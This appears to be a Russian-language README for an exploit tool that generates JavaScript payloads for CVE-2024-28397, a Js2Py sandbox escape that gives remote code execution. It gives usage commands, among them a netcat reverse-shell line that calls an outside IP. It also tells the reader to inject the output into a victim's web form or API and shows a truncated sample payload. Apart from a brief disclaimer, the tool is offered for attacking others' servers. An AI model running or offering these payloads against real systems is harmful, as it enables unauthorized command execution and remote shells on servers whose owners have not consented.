
Профессиональный эксплойт для CVE-2024-28397: Js2Py Sandbox Escape, приводящий к удаленному выполнению кода (RCE). Включает модульную генерацию полезных нагрузок.
💡 Глубокое погружение: Нажмите здесь, чтобы прочитать полный технический брифинг (PDF).
Профессиональный генератор полезной нагрузки для CVE-2024-28397. Этот инструмент генерирует вредоносный JavaScript-код, предназначенный для обхода песочницы js2py (версии <= 0.74) и выполнения произвольных команд на целевой системе.
Js2PyObject.getOwnPropertyNames для доступа к классу subprocess.Popen Python из среды JavaScript.Этот скрипт генерирует точную полезную нагрузку JavaScript, необходимую для эксплуатации уязвимости. Для использования этого инструмента не требуется устанавливать js2py.
Запустите скрипт с командой, которую хотите выполнить на машине жертвы.
# Generate payload to run 'id'
python3 exploit.py -c "id"
# Generate payload for a Reverse Shell
python3 exploit.py -c "nc -e /bin/bash 10.10.10.10 4444"
Скопируйте вывод, сгенерированный инструментом, и внедрите его в уязвимое приложение (например, веб-форму, конечную точку API или файл конфигурации, который обрабатывается js2py).
Пример внедрения:
Если веб-сайт принимает пользовательский ввод и выполняет его с помощью js2py.eval_js(user_input), вставка сгенерированного кода выполнит вашу команду на их сервере.
$ python3 exploit.py -c "whoami"
var output = "Initial";
try {
var leaked_wrapper = Object.getOwnPropertyNames({});
// ... (full malicious code) ...
var res = Popen("whoami", ...).communicate();
output = res;
} ...
output
Ali Sünbül (xeloxa)
Данное программное обеспечение предоставляется только для образовательных целей и исследований в области безопасности. Автор не несет ответственности за любое неправомерное использование этого кода. Убедитесь, что у вас есть явное разрешение, прежде чем тестировать это на любой системе, которую вы не контролируете.